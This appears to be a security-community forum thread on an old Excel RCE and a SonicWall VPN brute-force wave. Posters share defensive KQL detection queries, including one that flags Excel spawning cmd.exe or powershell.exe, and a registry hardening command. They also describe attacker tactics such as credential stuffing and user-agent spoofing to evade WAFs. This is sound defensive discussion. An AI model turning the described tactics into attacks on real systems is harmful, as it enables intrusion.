ThreatsDay Debrief: Ancient Excel RCEs & SonicWall Brute-Force
Morning everyone. Just catching up on the ThreatsDay Bulletin. While the Defender 'BlueHammer' 0-day is getting the spotlight (and rightfully so), I'm actually more concerned about the report of a 17-year-old Excel RCE that just dropped.
A 17-year-old bug? In 2026? It really highlights how much 'technical debt' lives inside our file parsers. If you have legacy macros or internal tools built on older Excel APIs running in compatibility mode, you might want to audit them immediately. Threat actors are dusting off exploits for logic flaws that everyone forgot existed.
On top of that, we're seeing a massive wave of SonicWall brute-force attacks. It appears to be a widespread credential-stuffing campaign targeting SSL-VPN services.
If you're running a SonicWall appliance, I'd recommend throwing this logic into your SIEM to detect the spike:
CommonSecurityLog
| where DeviceVendor == "SonicWall"
| where DeviceProduct == "SonicOS"
| where Activity == "VPN Login"
| project TimeGenerated, SourceIP, DestinationIP, DeviceAction, ResultCode
| summarize count() by SourceIP, bin(TimeGenerated, 5m)
| where count_ > 10 // Threshold adjustment required based on your baselines
Is anyone else seeing a spike in VPN auth failures today, or are we just lucky?
We saw the SonicWall activity starting around 0200 UTC. The user-agents are spoofing standard browsers, but the request patterns are clearly automated. We pushed a 'deny all' rule for Geo-IPs we don't do business with and it stopped immediately. It feels like they are probing for weak MFA implementations.
Regarding the Excel bug, this feels like a replay of the Follina drama (CVE-2022-30190) but with even older tech. We've started blocking legacy macros via GPO entirely:
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "BlockContentExecutionFromInternet" -Value 1
It breaks a few internal reports, but it's better than a 17-year-old RCE.
From a pentesting perspective, 'ancient' bugs are the most lucrative. Clients often patch the new CVEs from Patch Tuesday but forget that their legacy finance app still relies on a DLL from 2008. If you haven't done an asset inventory recently, now is the time.
Pete’s GPO approach is solid, but don't sleep on the SonicWall vector. My honeypots are seeing attackers chaining the VPN brute-force with specific user-agent strings to bypass simple WAFs.
To catch the slow-and-low attempts Omar mentioned, try correlating auth failures over short windows with this KQL snippet:
CommonSecurityLog
| where DeviceVendor == "SonicWall"
| where Activity == "VPN Login"
| summarize Failures = countif(LogonResult == "Failure") by SourceIP, bin(TimeGenerated, 10m)
| where Failures > 5
Valid point on the technical debt. While blocking macros is crucial, detection is key for file-based attacks. You can query for suspicious child processes spawned by Excel, specifically looking for command-line arguments often abused in these legacy exploits.
DeviceProcessEvents
| where InitiatingProcessFileName has "excel.exe"
| where FileName in~ ("cmd.exe", "powershell.exe")
| project Timestamp, DeviceName, FileName, ProcessCommandLine
This helps catch instances where a malicious document bypasses the macro block or uses a different vector.
Verified Access Required
To maintain the integrity of our intelligence feeds, only verified partners and security professionals can post replies.
Request Access